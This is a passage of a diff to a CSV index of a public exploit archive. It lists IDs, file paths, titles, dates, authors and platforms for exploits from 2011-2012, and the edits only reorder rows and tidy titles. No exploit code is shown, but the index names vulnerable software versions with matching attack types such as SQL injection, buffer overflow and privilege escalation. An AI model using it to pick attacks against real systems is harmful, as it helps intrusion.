Vulnerability",2011-08-17,NoGe,php,webapps,0 @@ -15331,8 +15363,8 @@ id,file,description,date,author,platform,type,port 17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin <= 1.1.7 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution",2011-08-19,metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow Exploit (MSF)",2011-08-19,Qnix,windows,remote,0 -17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty <= 1.0.7 - SQL Injection Vulnerability",2011-08-19,H4T$A,php,webapps,0 +17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd Remote Denial of Service (memory exhaustion)",2011-08-19,kingcope,multiple,dos,0 17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,metasploit,windows,remote,0 17698,platforms/php/webapps/17698.rb,"Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",2011-08-19,metasploit,php,webapps,0 @@ -15385,7 +15417,7 @@ id,file,description,date,author,platform,type,port 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin <= 5.4.3 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 - Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection Vulnerability",2011-08-30,SubhashDasyam,php,webapps,0 -17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit, DEP+ASLR Bypass.",2011-08-30,sickness,windows,local,0 +17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit (DEP+ASLR Bypass)",2011-08-30,sickness,windows,local,0 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin <= 2.0.2 - SQL Injection Vulnerability",2011-08-30,"Miroslav Stampar",php,webapps,0 17756,platforms/php/webapps/17756.txt,"Wordpress Plugin audio gallery playlist <= 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin <= 1.1.4 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 @@ -15398,12 +15430,13 @@ id,file,description,date,author,platform,type,port 17764,platforms/php/webapps/17764.txt,"Wordpress Plugin Bannerize <= 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin <= 1.0.8 - SQL Injection Vulnerability",2011-09-01,"Miroslav Stampar",php,webapps,0 -17769,platforms/linux/dos/17769.c,"Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,metasploit,windows,local,0 +17769,platforms/linux/dos/17769.c,"Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin <= 1.1 - SQL Injection Vulnerability",2011-09-02,"Miroslav Stampar",php,webapps,0 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 - SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0 17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0 +17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 - SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 - SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0 @@ -15413,7 +15446,6 @@ id,file,description,date,author,platform,type,port 17783,platforms/windows/local/17783.pl,"ZipX for Windows 1.71 ZIP File - Buffer Overflow Exploit",2011-09-05,"C4SS!0 G0M3S",windows,local,0 17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption)",2011-09-05,"BSOD Digital",windows,dos,0 17786,platforms/php/webapps/17786.txt,"Webmobo WB News System Blind SQL Injection",2011-09-05,"Eyup CELIK",php,webapps,0 -17787,platforms/linux/local/17787.c,"Linux Kernel < 2.6.36.2 - Econet Privilege Escalation Exploit",2011-09-05,"Jon Oberheide",linux,local,0 17788,platforms/windows/local/17788.py,"DVD X Player 5.5 Pro SEH Overwrite",2011-09-06,blake,windows,local,0 17789,platforms/php/webapps/17789.txt,"WordPress Tweet Old Post plugin <= 3.2.5 - SQL Injection Vulnerability",2011-09-06,sherl0ck_,php,webapps,0 17790,platforms/php/webapps/17790.txt,"WordPress post highlights plugin <= 2.2 - SQL Injection Vulnerability",2011-09-06,"Miroslav Stampar",php,webapps,0 @@ -15428,6 +15460,8 @@ id,file,description,date,author,platform,type,port 17800,platforms/php/webapps/17800.txt,"AM4SS 1.2 - CSRF add admin Vulnerability",2011-09-08,"red virus",php,webapps,0 17801,platforms/php/webapps/17801.rb,"Wordpress 1 Flash Gallery Plugin Arbiraty File Upload Exploit (MSF)",2011-09-08,"Ben Schmidt",php,webapps,0 17803,platforms/windows/local/17803.php,"DVD X Player 5.5 Pro (SEH DEP + ASLR Bypass) Exploit",2011-09-08,Rew,windows,local,0 +21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 +21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 17806,platforms/linux/dos/17806.txt,"Ubuntu <= 11.04 ftp client Local Buffer Overflow Crash PoC",2011-09-08,localh0t,linux,dos,0 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Vulnerability",2011-09-08,"RiRes Walid",php,webapps,0 17808,platforms/php/webapps/17808.txt,"WordPress WP-Filebase Download Manager plugin <= 0.2.9 - SQL Injection Vulnerability",2011-09-09,"Miroslav Stampar",php,webapps,0 @@ -15442,14 +15476,15 @@ id,file,description,date,author,platform,type,port 17818,platforms/php/webapps/17818.txt,"TomatoCart 1.1 Post Auth Local File Inclusion Vulnerability",2011-09-12,brain[pillow],php,webapps,0 17819,platforms/windows/remote/17819.py,"KnFTP Server Buffer Overflow Exploit",2011-09-12,blake,windows,remote,0 17820,platforms/windows/local/17820.c,"Aika 0.2 colladaconverter Xml Parsing Buffer Overflow",2011-09-12,isciurus,windows,local,0 -17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - (.pll) Buffer Overflow Exploit",2011-09-12,"Ivn Garca Ferreira",windows,local,0 +17821,platforms/windows/local/17821.py,"Wav Player 1.1.3.6 - (.pll) Buffer Overflow Exploit",2011-09-12,"Iván García Ferreira",windows,local,0 17822,platforms/php/webapps/17822.txt,"PHP Support Tickets 2.2 - Code Execution",2011-09-12,brain[pillow],php,webapps,0 17823,platforms/php/webapps/17823.txt,"NetCat CMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 17824,platforms/php/webapps/17824.txt,"Slaed CMS - Code Execution Vulnerability",2011-09-12,brain[pillow],php,webapps,0 17825,platforms/php/webapps/17825.txt,"AstroCMS - Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 +21785,platforms/windows/dos/21785.pl,"HCView WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 -17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server <= 1.7 - SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 - SQL Injection Vulnerability",2011-09-13,sherl0ck_,php,webapps,0 +17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server <= 1.7 - SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"Microsoft WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce <= 3.8.6 - SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 @@ -15471,12 +15506,12 @@ id,file,description,date,author,platform,type,port 17850,platforms/php/webapps/17850.txt,"iBrowser Plugin 1.4.1 (lang) - Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 17851,platforms/php/webapps/17851.txt,"iManager Plugin 1.2.8 (lang) - Local File Inclusion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 17852,platforms/php/webapps/17852.txt,"iManager Plugin 1.2.8 (d) - Remote Arbitrary File Deletion Vulnerability",2011-09-17,LiquidWorm,php,webapps,0 +17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability",2011-09-19,Septemb0x,php,webapps,0 +17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability",2011-09-19,LiquidWorm,php,webapps,0 +17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability",2011-09-18,"Miroslav Stampar",php,webapps,0 17854,platforms/windows/local/17854.py,"MY MP3 Player 3.0 m3u Exploit DEP Bypass",2011-09-17,blake,windows,local,0 17855,platforms/windows/remote/17855.rb,"DaqFactory HMI NETB Request Overflow",2011-09-18,metasploit,windows,remote,0 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server Multiple Buffer Overflow Exploit (DoS PoC)",2011-09-18,loneferret,windows,dos,21 -17857,platforms/php/webapps/17857.txt,"WordPress Count per Day plugin <= 2.17 SQL Injection Vulnerability",2011-09-18,"Miroslav Stampar",php,webapps,0 -17858,platforms/php/webapps/17858.txt,"WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability",2011-09-19,Septemb0x,php,webapps,0 -17859,platforms/php/webapps/17859.txt,"Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability",2011-09-19,LiquidWorm,php,webapps,0 17860,platforms/php/webapps/17860.txt,"Wordpress TheCartPress Plugin 1.1.1 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17861,platforms/php/webapps/17861.txt,"Wordpress AllWebMenus Plugin 1.1.3 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17862,platforms/php/webapps/17862.txt,"Wordpress WPEasyStats Plugin 1.8 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 @@ -15487,7 +15522,7 @@ id,file,description,date,author,platform,type,port 17867,platforms/php/webapps/17867.txt,"Wordpress Zingiri Web Shop Plugin 2.2.0 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17868,platforms/php/webapps/17868.txt,"Wordpress Mini Mail Dashboard Widget Plugin 1.36 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 17869,platforms/php/webapps/17869.txt,"Wordpress Relocate Upload Plugin 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0 -17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - Remote Buffer Overflow Exploit, 'USER' command",2011-09-19,mr.pr0n,windows,remote,0 +17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow Exploit",2011-09-19,mr.pr0n,windows,remote,0 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence Multiple Vulnerabilities - SOS-11-010",2011-09-19,"Sense of Security",hardware,webapps,0 17872,platforms/php/webapps/17872.txt,"Multiple Wordpress Plugin timthumb.php Vulnerabilites",2011-09-19,"Ben Schmidt",php,webapps,0 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0 @@ -15513,8 +15548,8 @@ id,file,description,date,author,platform,type,port 17895,platforms/php/webapps/17895.txt,"Jarida 1.0 - Multiple Vulnerabilities",2011-09-27,"Ptrace Security",php,webapps,0 17896,platforms/windows/dos/17896.txt,"PcVue <= 10.0 - Multiple Vulnerabilities",2011-09-27,"Luigi Auriemma",windows,dos,0 17897,platforms/jsp/webapps/17897.txt,"Omnidocs - Multiple Vulnerability",2011-09-27,"Sohil Garg",jsp,webapps,0 -17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17900,platforms/asp/webapps/17900.txt,"timelive time and expense tracking 4.1.1 - Multiple Vulnerabilities",2011-09-28,"Nathaniel Carew",asp,webapps,0 +17898,platforms/php/webapps/17898.txt,"redmind Online-Shop / E-Commerce-System SQL Injection Vulnerability",2011-09-27,"Indonesian BlackCoder",php,webapps,0 17901,platforms/osx/dos/17901.c,"Mac OS X < 10.6.7 Kernel Panic Exploit",2011-09-28,hkpco,osx,dos,0 17902,platforms/windows/local/17902.c,"Norman Security Suite 8 - (nprosec.sys) Local Privilege Escalation (0day)",2011-09-28,Xst3nZ,windows,local,0 17903,platforms/windows/dos/17903.txt,"NCSS <= 07.1.21 Array Overflow with Write2",2011-09-29,"Luigi Auriemma",windows,dos,0 @@ -15529,7 +15564,7 @@ id,file,description,date,author,platform,type,port 17920,platforms/php/webapps/17920.txt,"Vivvo CMS - Local File include",2011-10-02,JaBrOtxHaCkEr,php,webapps,0 17921,platforms/asp/webapps/17921.txt,"GotoCode Online Bookstore Multiple Vulnerabilities",2011-10-03,"Nathaniel Carew",asp,webapps,0 17922,platforms/cgi/webapps/17922.rb,"CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",2011-10-02,metasploit,cgi,webapps,0 -17924,platforms/jsp/webapps/17924.pl,"JBoss, JMX Console, misconfigured DeploymentScanner",2011-10-03,y0ug,jsp,webapps,0 +17924,platforms/jsp/webapps/17924.pl,"JBoss & JMX Console & Misconfigured Deployment Scanner",2011-10-03,y0ug,jsp,webapps,0 17925,platforms/php/webapps/17925.txt,"Concrete5 <= 5.4.2.1 - Multiple Vulnerabilities",2011-10-04,"Ryan Dewhurst",php,webapps,0 17926,platforms/php/webapps/17926.txt,"Easy Hosting Control Panel Admin Auth Bypass",2011-10-04,Jasman,php,webapps,0 17927,platforms/php/webapps/17927.txt,"CF Image Hosting Script 1.3.82 File Disclosure",2011-10-04,bd0rk,php,webapps,0 @@ -15539,6 +15574,7 @@ id,file,description,date,author,platform,type,port 17931,platforms/windows/dos/17931.txt,"genstat <= 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101- Linux - Local Privilege Escalation",2011-10-05,zx2c4,linux,local,0 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player ""file://"" Buffer Overflow Vulnerability PoC",2011-10-05,Snake,windows,dos,0 +18033,platforms/php/webapps/18033.txt,"Joomla YJ Contact us Component Local File Inclusion Vulnerability",2011-10-25,MeGo,php,webapps,0 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library (show.php) SQL Injection",2011-10-06,M.Jock3R,php,webapps,0 17936,platforms/windows/remote/17936.rb,"Opera 10/11 (bad nesting with frameset tag) Memory Corruption",2011-10-06,"Jose A. Vazquez",windows,remote,0 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection Vulnerability",2011-10-07,M.Jock3R,php,webapps,0 @@ -15556,6 +15592,10 @@ id,file,description,date,author,platform,type,port 17950,platforms/php/webapps/17950.txt,"GotoCode Online Classifieds Multiple Vulnerabilities",2011-10-09,"Nathaniel Carew",php,webapps,0 17951,platforms/php/webapps/17951.txt,"openEngine 2.0 - Multiple Blind SQL Injection vulnerabilities",2011-10-10,"Stefan Schurtz",php,webapps,0 17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection Vulnerability",2011-10-10,"Stefan Schurtz",php,webapps,0 +17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0 +17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0 +17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 +17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta - Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 @@ -15569,10 +15609,6 @@ id,file,description,date,author,platform,type,port 17965,platforms/windows/dos/17965.txt,"OPC Systems.NET <= 4.00.0048 - Denial of Service",2011-10-10,"Luigi Auriemma",windows,dos,0 17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate PLP File id Parameter Overflow",2011-10-10,metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Zip File Parsing Buffer Overflow Vulnerability",2011-10-11,metasploit,windows,local,0 -17969,platforms/multiple/remote/17969.py,"Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC",2011-10-11,"Rodrigo Marcos",multiple,remote,0 -17970,platforms/php/webapps/17970.txt,"WP-SpamFree WordPress Spam Plugin SQL Injection Vulnerability",2011-10-11,cheki,php,webapps,0 -17972,platforms/php/webapps/17972.txt,"MyBB MyStatus 3.1 - SQL Injection Vulnerability",2011-10-12,Mario_Vs,php,webapps,0 -17973,platforms/php/webapps/17973.txt,"WordPress GD Star Rating plugin <= 1.9.10 SQL Injection",2011-10-12,"Miroslav Stampar",php,webapps,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow Exploit",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability",2011-10-12,metasploit,windows,remote,0 17976,platforms/windows/remote/17976.rb,"Mozilla Firefox Array.reduceRight() Integer Overflow",2011-10-13,metasploit,windows,remote,0 @@ -15582,14 +15618,14 @@ id,file,description,date,author,platform,type,port 17981,platforms/windows/dos/17981.py,"Windows - TCP/IP Stack Denial of Service (MS11-064)",2011-10-15,"Byoungyoung Lee",windows,dos,0 17982,platforms/windows/dos/17982.pl,"BlueZone Desktop .zap file Local Denial of Service Vulnerability",2011-10-15,Silent_Dream,windows,dos,0 17983,platforms/php/webapps/17983.txt,"Wordpress Plugin Photo Album Plus <= 4.1.1 - SQL Injection Vulnerability",2011-10-15,Skraps,php,webapps,0 -17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 File Parsing Buffer Overflow",2011-10-16,metasploit,windows,local,0 +17984,platforms/php/webapps/17984.txt,"Ruubikcms 1.1.0 - (/extra/image.php) Local File Inclusion",2011-10-16,"Sangyun YOO",php,webapps,0 17986,platforms/osx/remote/17986.rb,"Apple Safari file:// Arbitrary Code Execution",2011-10-17,metasploit,osx,remote,0 17987,platforms/php/webapps/17987.txt,"WordPress BackWPUp Plugin 2.1.4 Code Execution",2011-10-17,"Sense of Security",php,webapps,0 -17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 -17992,platforms/php/webapps/17992.txt,"Gnuboard <= 4.33.02 tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit libxslt Arbitrary File Creation",2011-10-18,metasploit,windows,remote,0 17994,platforms/php/webapps/17994.php,"Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0 +17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game Persistent XSS",2011-10-17,M.Jock3R,php,webapps,0 +17992,platforms/php/webapps/17992.txt,"Gnuboard <= 4.33.02 tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0 17995,platforms/php/webapps/17995.txt,"NoNumber Framework Joomla! Plugin Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0 17996,platforms/linux_mips/shellcode/17996.c,"MIPS Linux XOR Shellcode Encoder (60 Bytes)",2011-10-18,entropy,linux_mips,shellcode,0 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection & XSS vulnerabilities",2011-10-19,"Stefan Schurtz",php,webapps,0 @@ -15613,30 +15649,30 @@ id,file,description,date,author,platform,type,port 18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 -18019,platforms/windows/dos/18019.txt,"Google Chrome PoC, killing thread",2011-10-22,pigtail23,windows,dos,0 +18019,platforms/windows/dos/18019.txt,"Google Chrome - Killing Thread PoC",2011-10-22,pigtail23,windows,dos,0 18020,platforms/php/webapps/18020.txt,"jara 1.6 - SQL Injection Vulnerability",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0 18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference Vulnerability PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0 +18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection Vulnerability",2011-10-28,"Chris Russell",php,webapps,0 +18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 [build 237] - DoS (Poc).",2011-10-28,loneferret,windows,dos,0 +18068,platforms/hardware/remote/18068.rb,"LifeSize Room Command Injection",2011-11-02,metasploit,hardware,remote,0 +18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 +18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow",2011-10-24,metasploit,windows,local,0 18028,platforms/windows/dos/18028.py,"zFTP Server ""cwd/stat"" Remote Denial-of-Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection",2011-10-25,metasploit,php,webapps,0 18032,platforms/windows/webapps/18032.rb,"SAP Management Console OSExecute Payload Execution",2011-10-24,metasploit,windows,webapps,0 -18033,platforms/php/webapps/18033.txt,"Joomla YJ Contact us Component Local File Inclusion Vulnerability",2011-10-25,MeGo,php,webapps,0 18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop XSS Vulnerability",2011-10-26,M.Jock3R,php,webapps,0 18036,platforms/php/webapps/18036.txt,"eFront <= 3.6.10 (build 11944) Multiple Security Vulnerabilities",2011-10-27,EgiX,php,webapps,0 18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP reserve.php start_date Parameter Arbitrary Code Injection",2011-10-26,metasploit,php,webapps,0 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow",2011-10-26,metasploit,windows,local,0 18039,platforms/php/webapps/18039.txt,"WordPress wptouch plugin SQL Injection Vulnerability",2011-10-27,longrifle0x,php,webapps,0 -18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change PoC",2011-10-28,vladz,linux,local,0 -18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection Vulnerability",2011-10-28,"Chris Russell",php,webapps,0 -18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 [build 237] - DoS (Poc).",2011-10-28,loneferret,windows,dos,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 -18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 @@ -15655,7 +15691,6 @@ id,file,description,date,author,platform,type,port 18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection Vulnerability",2011-11-02,LiquidWorm,php,webapps,0 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 - Local File Include Vulnerability",2011-11-02,"Rami Salama",php,webapps,0 18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 -18068,platforms/hardware/remote/18068.rb,"LifeSize Room Command Injection",2011-11-02,metasploit,hardware,remote,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 18070,platforms/php/webapps/18070.txt,"Web File Browser 0.4b14 File Download Vulnerability",2011-11-03,"Sangyun YOO",php,webapps,0 18071,platforms/linux/local/18071.sh,"Calibre E-Book Reader Local Root Exploit",2011-11-03,zx2c4,linux,local,0 @@ -15685,13 +15720,16 @@ id,file,description,date,author,platform,type,port 18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 - 2.2.10 - Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 +18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,metasploit,php,webapps,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - 